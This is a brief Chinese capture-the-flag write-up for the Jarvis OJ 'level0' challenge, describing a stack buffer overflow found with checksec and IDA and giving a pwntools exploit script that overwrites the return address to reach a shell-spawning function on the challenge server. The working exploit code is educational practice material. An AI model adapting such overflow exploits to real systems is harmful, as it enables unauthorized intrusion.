checksec 一波,只开了NX
image.png再IDA看一下程序 ,栈溢出,再找一找有没有可用的函数
image.png发现了这个
image.pngexp:
#-*- coding:utf-8 -*-
from pwn import *
# p = process('./level0')
p = remote("pwn2.jarvisoj.com","9881")
callsystem = 0x400596
payload = 0x80*"A" + p64(0) + p64(callsystem)
p.sendline(payload)
p.interactive()
网友评论